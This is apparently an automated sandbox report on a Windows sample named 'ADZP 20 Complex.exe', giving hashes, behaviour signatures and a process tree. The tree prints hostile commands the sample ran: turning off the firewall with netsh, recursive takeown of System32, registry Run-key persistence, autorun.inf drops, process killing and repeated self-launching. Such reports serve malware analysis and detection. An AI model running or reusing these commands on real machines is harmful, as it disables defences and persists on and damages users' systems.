Analysis
max time kernel: 1s
max time network: 276s
platform: windows10-2004_x64
resource: win10v2004-20240426-en
resource tags: arch:x64 arch:x86 image:win10v2004-20240426-en locale:en-us os:windows10-2004-x64 system
submitted: 10-05-2024 23:11
Static task
static1
Behavioral task
behavioral1
Sample: ADZP 20 Complex.exe
Resource: win10v2004-20240426-en
Behavioral task
behavioral2
Sample: ADZP 20 Complex.exe
Resource: win11-20240508-en
General
Target: ADZP 20 Complex.exe
Size: 106KB
MD5: 8b6a377f9a67d5482a8eba5708f45bb2
SHA1: 7197436525e568606850ee5e033c43aea1c3bc91
SHA256: 6ca11c8b6442db97c02f3b0f73db61f58c96d52e8a880e33abee5b10807d993f
SHA512: 644e51798399168530b05e629b414dd80cac678bd3c8d4a5d164f55736a2b2fd380d3ca4640f7a034c8f043c06b1527b473e2d17da088d5e97de6ea04120dd72
SSDEEP: 3072:v7DhdC6kzWypvaQ0FxyNTBfqMXERseQF8:vBlkZvaF4NTBSAesPF8
Malware Config
Signatures
-
Modifies Windows Firewall 2 TTPs 12 IoCs
Possible privilege escalation attempt 64 IoCs
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | cmd.exe
Modifies file permissions 1 TTPs 64 IoCs
Drops autorun.inf file 1 TTPs 2 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
description | ioc | Process
File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | cmd.exe
File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | attrib.exe
Drops file in System32 directory 2 IoCs
description | ioc | Process
File created | C:\Windows\System32\Twain_20.dll | cmd.exe
File opened for modification | C:\Windows\System32\Twain_20.dll | cmd.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Gathers network information 2 TTPs 18 IoCs
Uses commandline utility to view network configuration.
Kills process with taskkill 17 IoCs
Modifies registry class 1 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings | cmd.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs
description | pid | Process
Token: SeDebugPrivilege | 4868 | taskkill.exe
Token: SeTakeOwnershipPrivilege | 4984 | takeown.exe
Suspicious use of WriteProcessMemory 32 IoCs
Views/modifies file attributes 1 TTPs 15 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe" cmd /k "taskkill /im cmd.exe /f"1⤵
- Suspicious use of WriteProcessMemory
PID:216 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\46AE.tmp\46AF.tmp\46B0.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe" cmd /k "taskkill /im cmd.exe /f""2⤵
- Checks computer location settings
- Drops autorun.inf file
- Drops file in System32 directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd3⤵PID:4756
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd3⤵PID:4904
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"3⤵PID:1908
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat3⤵
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4984
-
-
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f3⤵PID:4936
-
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f3⤵PID:1016
-
-
C:\Windows\system32\ipconfig.exeipconfig /release3⤵
- Gathers network information
PID:4764
-
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4868
-
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*3⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:2932
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵PID:396
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵PID:4964
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵PID:2144
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵PID:2044
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵PID:5012
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵PID:1368
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵PID:772
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵PID:5116
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵PID:2260
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵PID:1080
-
-
C:\Windows\system32\msg.exemsg * Virus Detectado3⤵PID:4780
-
-
C:\Windows\system32\msg.exemsg * Virus Detectado3⤵PID:4464
-
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!3⤵PID:2020
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"3⤵PID:2816
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\51C9.tmp\51CA.tmp\51CB.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""4⤵PID:448
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd5⤵PID:5212
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd5⤵PID:5432
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"5⤵PID:5848
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat5⤵PID:5964
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4948
-
-
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f5⤵PID:3744
-
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f5⤵PID:1644
-
-
C:\Windows\system32\ipconfig.exeipconfig /release5⤵
- Gathers network information
PID:3240
-
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f5⤵
- Kills process with taskkill
PID:1956
-
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*5⤵
- Views/modifies file attributes
PID:4680
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵PID:6092
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵PID:4280
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵PID:5136
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵PID:2752
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵PID:2952
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵PID:5192
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵PID:1732
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵PID:2392
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵PID:1088
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵PID:5688
-
-
C:\Windows\system32\msg.exemsg * Virus Detectado5⤵PID:5996
-
-
C:\Windows\system32\msg.exemsg * Virus Detectado5⤵PID:2668
-
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!5⤵PID:5692
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"5⤵PID:6280
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B769.tmp\B76A.tmp\B76B.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""6⤵PID:6548
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd7⤵PID:7908
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd7⤵PID:8160
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"7⤵PID:6480
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat7⤵PID:8284
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r8⤵
- Modifies file permissions
PID:8540
-
-
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f7⤵PID:8588
-
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f7⤵PID:8780
-
-
C:\Windows\system32\ipconfig.exeipconfig /release7⤵
- Gathers network information
PID:8948
-
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f7⤵
- Kills process with taskkill
PID:4788
-
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*7⤵
- Views/modifies file attributes
PID:8784
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:9744
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:9984
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:10208
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:4608
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:6288
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:9936
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:10432
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:10652
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:10904
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:11256
-
-
C:\Windows\system32\msg.exemsg * Virus Detectado7⤵PID:920
-
-
C:\Windows\system32\msg.exemsg * Virus Detectado7⤵PID:5040
-
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!7⤵PID:8556
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵PID:8216
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3212.tmp\3213.tmp\3214.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵PID:11440
-
-
-
C:\Windows\system32\notepad.exenotepad7⤵PID:10644
-
-
C:\Windows\system32\calc.execalc7⤵PID:11424
-
-
C:\Windows\explorer.exeexplorer.exe7⤵PID:11628
-
-
C:\Windows\system32\mspaint.exemspaint.exe7⤵PID:11832
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵PID:12136
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5645.tmp\5645.tmp\5646.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵PID:12584
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd9⤵PID:8016
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off9⤵
- Modifies Windows Firewall
PID:8752
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"9⤵PID:12520
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat9⤵PID:9272
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Modifies file permissions
PID:13388
-
-
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f9⤵PID:11048
-
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f9⤵PID:2424
-
-
C:\Windows\system32\ipconfig.exeipconfig /release9⤵
- Gathers network information
PID:14436
-
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f9⤵
- Kills process with taskkill
PID:15088
-
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*9⤵
- Views/modifies file attributes
PID:14360
-
-
-
-
C:\Windows\system32\notepad.exenotepad7⤵PID:11816
-
-
C:\Windows\system32\calc.execalc7⤵PID:12380
-
-
C:\Windows\explorer.exeexplorer.exe7⤵PID:12796
-
-
C:\Windows\system32\mspaint.exemspaint.exe7⤵PID:13068
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵PID:764
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\81A9.tmp\81AA.tmp\81BB.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵PID:13468
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd9⤵PID:9268
-
C:\Windows\system32\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"10⤵PID:14288
-
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off9⤵
- Modifies Windows Firewall
PID:12868
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd9⤵PID:13020
-
-
-
-
C:\Windows\system32\notepad.exenotepad7⤵PID:3828
-
-
C:\Windows\system32\calc.execalc7⤵PID:13320
-
-
C:\Windows\explorer.exeexplorer.exe7⤵PID:13632
-
-
C:\Windows\system32\mspaint.exemspaint.exe7⤵PID:13956
-
-
-
-
C:\Windows\system32\notepad.exenotepad5⤵PID:6292
-
-
C:\Windows\system32\calc.execalc5⤵PID:6340
-
-
C:\Windows\explorer.exeexplorer.exe5⤵PID:6364
-
-
C:\Windows\system32\mspaint.exemspaint.exe5⤵PID:6556
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"5⤵PID:6732
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C081.tmp\C082.tmp\C083.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""6⤵PID:6544
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd7⤵PID:9044
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd7⤵PID:9052
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"7⤵PID:8312
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat7⤵PID:8352
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:7928
-
-
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f7⤵PID:8524
-
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f7⤵PID:8624
-
-
C:\Windows\system32\ipconfig.exeipconfig /release7⤵
- Gathers network information
PID:7328
-
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f7⤵
- Kills process with taskkill
PID:8804
-
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*7⤵
- Views/modifies file attributes
PID:8896
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:10200
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:5440
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:6964
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:10012
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:10280
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:10604
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:10892
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:11224
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:8476
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:11140
-
-
C:\Windows\system32\msg.exemsg * Virus Detectado7⤵PID:9852
-
-
C:\Windows\system32\msg.exemsg * Virus Detectado7⤵PID:8768
-
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!7⤵PID:11304
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵PID:11792
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4D0D.tmp\4D0E.tmp\4D0F.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵PID:11268
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd9⤵PID:11148
-
C:\Windows\System32\Twain_20.dllC:\Windows\System32\Twain_20.dll10⤵PID:14444
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\D0B0.tmp\D0B0.tmp\D0B1.bat C:\Windows\System32\Twain_20.dll"11⤵PID:10864
-
-
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off9⤵
- Modifies Windows Firewall
PID:15240
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd9⤵PID:13760
-
-
-
-
C:\Windows\system32\notepad.exenotepad7⤵PID:12100
-
-
C:\Windows\system32\calc.execalc7⤵PID:12188
-
-
C:\Windows\explorer.exeexplorer.exe7⤵PID:12236
-
-
C:\Windows\system32\mspaint.exemspaint.exe7⤵PID:12268
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵PID:2692
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5644.tmp\5645.tmp\5646.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵PID:12572
-
-
-
C:\Windows\system32\notepad.exenotepad7⤵PID:8304
-
-
C:\Windows\system32\calc.execalc7⤵PID:9204
-
-
C:\Windows\explorer.exeexplorer.exe7⤵PID:11252
-
-
C:\Windows\system32\mspaint.exemspaint.exe7⤵PID:10576
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵PID:7460
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5BC2.tmp\5BC3.tmp\5BC4.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵PID:12696
-
-
-
C:\Windows\system32\notepad.exenotepad7⤵PID:4328
-
-
C:\Windows\system32\calc.execalc7⤵PID:8208
-
-
C:\Windows\explorer.exeexplorer.exe7⤵PID:11308
-
-
C:\Windows\system32\mspaint.exemspaint.exe7⤵PID:11304
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:12404
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:13216
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:13336
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:14224
-
-
-
-
C:\Windows\system32\notepad.exenotepad5⤵PID:6884
-
-
C:\Windows\system32\calc.execalc5⤵PID:6904
-
-
C:\Windows\explorer.exeexplorer.exe5⤵PID:6920
-
-
C:\Windows\system32\mspaint.exemspaint.exe5⤵PID:6932
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"5⤵PID:6944
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C3EC.tmp\C3ED.tmp\C3EE.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""6⤵PID:2280
-
-
-
C:\Windows\system32\notepad.exenotepad5⤵PID:6184
-
-
C:\Windows\system32\calc.execalc5⤵PID:6400
-
-
C:\Windows\explorer.exeexplorer.exe5⤵PID:6156
-
-
C:\Windows\system32\mspaint.exemspaint.exe5⤵PID:6228
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵PID:8760
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵PID:9004
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵PID:548
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵PID:8516
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵PID:8624
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵PID:9012
-
-
-
-
C:\Windows\system32\notepad.exenotepad3⤵PID:2472
-
-
C:\Windows\system32\calc.execalc3⤵PID:1192
-
-
C:\Windows\explorer.exeexplorer.exe3⤵PID:2380
-
-
C:\Windows\system32\mspaint.exemspaint.exe3⤵PID:3204
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"3⤵PID:5112
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\537F.tmp\5380.tmp\5381.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""4⤵PID:3084
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd5⤵PID:5948
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd5⤵PID:6084
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"5⤵PID:3816
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat5⤵PID:1964
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5148
-
-
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f5⤵PID:1884
-
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f5⤵PID:548
-
-
C:\Windows\system32\ipconfig.exeipconfig /release5⤵
- Gathers network information
PID:5284
-
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f5⤵
- Kills process with taskkill
PID:2560
-
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*5⤵
- Views/modifies file attributes
PID:2668
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵PID:5180
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵PID:7448
-
-
C:\Windows\system32\msg.exemsg * Virus Detectado5⤵PID:7988
-
-
C:\Windows\system32\msg.exemsg * Virus Detectado5⤵PID:8024
-
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!5⤵PID:8044
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"5⤵PID:8060
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\F25F.tmp\106.tmp\174.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""6⤵PID:676
-
